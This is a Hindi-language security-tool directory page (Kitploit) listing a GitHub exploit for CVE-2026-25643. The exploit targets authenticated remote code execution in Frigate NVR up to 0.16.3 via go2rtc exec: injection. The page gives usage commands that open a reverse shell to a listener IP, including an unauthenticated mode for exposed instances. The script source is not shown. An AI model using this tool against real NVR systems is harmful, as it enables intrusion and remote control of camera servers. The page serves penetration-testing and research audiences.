Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-25643-Frigate-RCE — Frigate NVR प्रमाणित RCE के लिए शोषण go2rtc exec: प्रोटोकॉल इंजेक्शन, सिस्टम कमांड निष्पादन और रिवर्स शेल कैप्चर को स्वचालित करना। | Kitploit
उपकरण/GitHubGitHub/jduardo2704/cve-2026-25643-frigate-rce
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षारिमोट एक्सेस टूल
GitHubjduardo2704/cve-2026-25643-frigate-rce

CVE-2026-25643-Frigate-RCE

Frigate NVR प्रमाणित RCE के लिए शोषण go2rtc exec: प्रोटोकॉल इंजेक्शन, सिस्टम कमांड निष्पादन और रिवर्स शेल कैप्चर को स्वचालित करना।

रिपॉजिटरी देखें
337 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-25643: Frigate NVR <= 0.16.3 प्रमाणित RCE

शोषण शीर्षक: Frigate NVR <= 0.16.3 - प्रमाणित दूरस्थ कोड निष्पादन
दिनांक: 2026-02-05
शोषण लेखक: jduardo2704
विक्रेता होमपेज: https://frigate.video/
सॉफ्टवेयर लिंक: https://github.com/blakeblackshear/frigate
संस्करण: <= 0.16.3
CVE: CVE-2026-25643 परामर्श: https://github.com/blakeblackshear/frigate/security/advisories/GHSA-4c97-5jmr-8f6x

विवरण

Frigate संस्करण 0.16.3 तक go2rtc कॉन्फ़िगरेशन के माध्यम से दूरस्थ कोड निष्पादन (RCE) के लिए असुरक्षित हैं। प्रमाणित पहुंच वाला हमलावर (या यदि इंस्टेंस खुला है तो अप्रमाणित) exec: प्रोटोकॉल का उपयोग करके स्ट्रीम कॉन्फ़िगरेशन में सिस्टम कमांड इंजेक्ट कर सकता है। यह शोषण पेलोड इंजेक्शन को स्वचालित करता है, सेवा को पुनरारंभ करता है, और रिवर्स शेल को पकड़ता है।

स्थापना

root@kitploit:~
pip install requests pyyaml

उपयोग

प्रमाणित मोड:

root@kitploit:~
python3 frigate_rce.py -u http://target:5000 -U admin -P password -lh YOUR_IP -lp 4444

अप्रमाणित मोड (यदि खुला हो):

root@kitploit:~
python3 frigate_rce.py -u http://target:5000 -lh YOUR_IP -lp 4444

अस्वीकरण

यह स्क्रिप्ट केवल शैक्षिक उद्देश्यों और अधिकृत सुरक्षा परीक्षण के लिए है।

टूल डाउनलोड करें